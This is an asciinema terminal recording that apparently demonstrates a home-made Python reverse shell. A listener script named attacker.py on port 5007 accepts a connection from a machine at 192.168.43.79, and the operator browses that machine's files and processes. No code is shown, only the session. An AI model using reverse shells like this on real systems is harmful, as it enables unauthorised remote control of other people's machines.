{"version": 2, "width": 195, "height": 47, "timestamp": 1576370296, "env": {"SHELL": "/bin/bash", "TERM": "xterm-256color"}}
[0.019673, "o", "\u001b]0;root@PIRATE: ~\u0007\u001b[01;31mroot@PIRATE\u001b[00m:\u001b[01;34m~\u001b[00m# "]
[1.575595, "o", "c"]
[1.700331, "o", "d"]
[1.883855, "o", " "]
[2.476193, "o", "D"]
[2.758584, "o", "e"]
[3.014177, "o", "s"]
[3.228733, "o", "k"]
[3.48732, "o", "t"]
[3.662124, "o", "o"]
[4.16842, "o", "p"]
[4.533351, "o", "\r\n"]
[4.533813, "o", "\u001b]0;root@PIRATE: ~/Desktop\u0007\u001b[01;31mroot@PIRATE\u001b[00m:\u001b[01;34m~/Desktop\u001b[00m# "]
[5.731221, "o", "p"]
[6.177401, "o", "y"]
[6.352046, "o", "t"]
[6.480761, "o", "h"]
[6.670601, "o", "o"]
[6.912124, "o", "n"]
[7.775574, "o", " "]
[8.953423, "o", "a"]
[9.885875, "o", "ttacker.py "]
[10.93069, "o", "\r\n"]
[10.949908, "o", "\u001b[H\u001b[2J\u001b[3J"]
[10.950153, "o", "\u001b[90m ____                                   ____  _          _ _    \r\n|  _ \\ _____   _____ _ __ ___  ___     / ___|| |__   ___| | |   \r\n| |_) / _ \\ \\ / / _ \\ '__/ __|/ _ \\____\\___ \\| '_ \\ / _ \\ | |   \r\n|  _ <  __/\\ V /  __/ |  \\__ \\  __/_____|__) | | | |  __/ | |_  \r\n|_| \\_\\___| \\_/ \\___|_|  |___/\\___|    |____/|_| |_|\\___|_|_(_) \u001b[0m\r\n\r\n\u001b[92mListening as {0.0.0.0}:{5007}...\u001b[0m\r\n"]
[15.778103, "o", "\u001b[92m{192.168.43.79}:{44866} Connected\u001b[0m\r\n"]
[15.791733, "o", "192.168.43.79@parrot\r\n $ "]
[18.53038, "o", "l"]
[18.713368, "o", "s"]
[19.147179, "o", "\r\n"]
[19.183806, "o", "\u001b[94mloser\r\nREADME.license\r\nvictim.py\r\n\u001b[0m\r\n192.168.43.79@parrot\r\n $ "]
[20.442305, "o", "c"]
[20.49716, "o", "d"]
[20.762375, "o", " "]
[21.149572, "o", "."]
[21.306672, "o", "."]
[21.712487, "o", "\r\n"]
[21.747476, "o", "\u001b[94mNew Directory: /home/stem\u001b[0m\r\n192.168.43.79@parrot\r\n $ "]
[22.756511, "o", "l"]
[22.882921, "o", "s"]
[23.207496, "o", "\r\n"]
[23.252767, "o", "\u001b[94mDesktop\r\nDocuments\r\nDownloads\r\nMusic\r\nPictures\r\nPublic\r\nTemplates\r\nVideos\r\n\u001b[0m\r\n192.168.43.79@parrot\r\n $ "]
[24.667747, "o", "c"]
[24.752146, "o", "d"]
[24.913457, "o", " "]
[25.736963, "o", "V"]
[25.947537, "o", "i"]
[26.216565, "o", "d"]
[26.276842, "o", "e"]
[26.539603, "o", "o"]
[26.668958, "o", "s"]
[27.558882, "o", "\r\n"]
[27.594148, "o", "\u001b[94mNew Directory: /home/stem/Videos\u001b[0m\r\n192.168.43.79@parrot\r\n $ "]
[28.700399, "o", "\r\n"]
[28.700847, "o", "\u001b[94m/bin/sh: 1: cd: can't cd to Videos\r\n\u001b[0m\r\n192.168.43.79@parrot\r\n $ "]
[29.654458, "o", "l"]
[29.760251, "o", "s"]
[29.96507, "o", "\r\n"]
[29.999795, "o", "\u001b[94mHis.Dark.Materials.S01E01.480p.x264-mSD[eztv].mkv\r\n\u001b[0m\r\n192.168.43.79@parrot\r\n $ "]
[32.088887, "o", "p"]
[32.198873, "o", "s"]
[32.523011, "o", "\r\n"]
[32.586208, "o", "\u001b[94m  PID TTY          TIME CMD\r\n 4124 pts/0    00:00:00 bash\r\n20056 pts/0    00:00:00 python\r\n20068 pts/0    00:00:00 sh\r\n20069 pts/0    00:00:00 ps\r\n\u001b[0m\r\n192.168.43.79@parrot\r\n $ "]
[34.474277, "o", "e"]
[34.925937, "o", "x"]
[35.261864, "o", "i"]
[35.459433, "o", "t"]
[35.939644, "o", "\r\n"]
[35.940015, "o", "\u001b[31mQUITTING!!\u001b[0m\r\n"]
[35.945221, "o", "\u001b]0;root@PIRATE: ~/Desktop\u0007\u001b[01;31mroot@PIRATE\u001b[00m:\u001b[01;34m~/Desktop\u001b[00m# "]
[37.794432, "o", "e"]
[38.0589, "o", "x"]
[38.263336, "o", "i"]
[38.428032, "o", "t"]
[38.821444, "o", "\r\n"]
[38.821665, "o", "exit\r\n"]
